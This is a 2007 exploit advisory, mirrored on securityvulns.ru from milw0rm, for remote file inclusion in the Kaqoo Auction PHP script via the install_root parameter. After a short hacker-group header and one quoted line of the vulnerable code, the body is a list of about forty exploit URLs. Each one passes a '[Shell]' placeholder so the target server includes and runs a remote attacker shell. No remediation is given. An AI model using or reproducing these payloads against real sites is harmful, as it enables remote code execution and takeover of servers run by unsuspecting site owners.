Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Eve-NukePortal file include (phpbb_root_path)

  MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability

  codebb 1.1b3  (phpbb_root_path
)Remote File Include Vulnerability

  JC URLshrink 1.3.1 Remote Code Execution Vulnerability

From:ThE dE@Th <mostafa_ragab_(at)_msn.com>
Date:02.04.2007
Subject:Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities

*************************************************************
To ConTacT mE @ www.Asb-May.net/bb
ScRiPt:-http://kaqoo.com/server/download.php
GrEaTz To:-ToOofa-HaCk.eGy-Alk()mad()z-Bright Dark (All AsB-MaY DisCoverY
ExPloIts GrOup)
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}   >>
******************************************************************************
Wrong Code:-
include_once("$install_root
********************************************************************************

ExPlOiT:-http://www.SitE.com/include/core/support.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/core/function.inc.php?install_root=[Shell]
ExPlOiT:-http
://www.SitE.com/include/core/rdal_object.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/core/rdal_editor.inc.php?install_root=
[Shell]
ExPlOiT:-http://www.SitE.com/include/core/login.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/core/request.inc.php?install_root=[Shell]
ExPlOiT:-http
://www.SitE.com/include/core/categories.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/item/save.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/item/preview.inc.php?install_root=
[Shell]
ExPlOiT:-
http://www.SitE.com/include/display/item/edit_item.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/item/new_item.inc.php?install_root=
[Shell]
ExPlOiT:-
http://www.SitE.com/include/display/item/item_info.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/search.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/item_edit.inc.php?install_root=
[Shell]
ExPlOiT:-
http://www.SitE.com/include/display/register_succsess.inc.php?install_root=
[Shell
]
ExPlOiT:-http
://www.SitE.com/include/display/context_menu.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/item_repost.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/balance.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/featured.inc.php?install_root=
[Shell]
ExPlOiT:-http://www.SitE.com/include/display/user.inc.php?install_root=[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/buynow.inc.php?install_root=
[Shell]
ExPlOiT:-
http://www.SitE.com/include/display/install_complete.inc.php?install_root=
[Shell]

ExPlOiT:-http
://www.SitE.com/include/display/fees_info.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/user_feedback.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/admin_balance.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/activate.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/user_info.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/member.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/add_bid.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/items_filter.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/my_info.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/register.inc.php?install_root=
[Shell]
ExPlOiT:-
http://www.SitE.com/include/display/leave_feedback.inc.php?install_root=
[Shell]
ExPlOiT:-http
://www.SitE.com/include/display/user_auctions.inc.php?install_root=
[Shell]
ExPlOiT:-http://www.SitE.com/include/design/form.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/processor.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/interfaces.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/left_menu.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/login.inc.php?install_root=[Shell]
ExPlOiT:-http://www.SitE.com/include/categories.inc.php?install_root=[Shell]
********************************************************************************


# milw0rm.com [2007-03-29]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server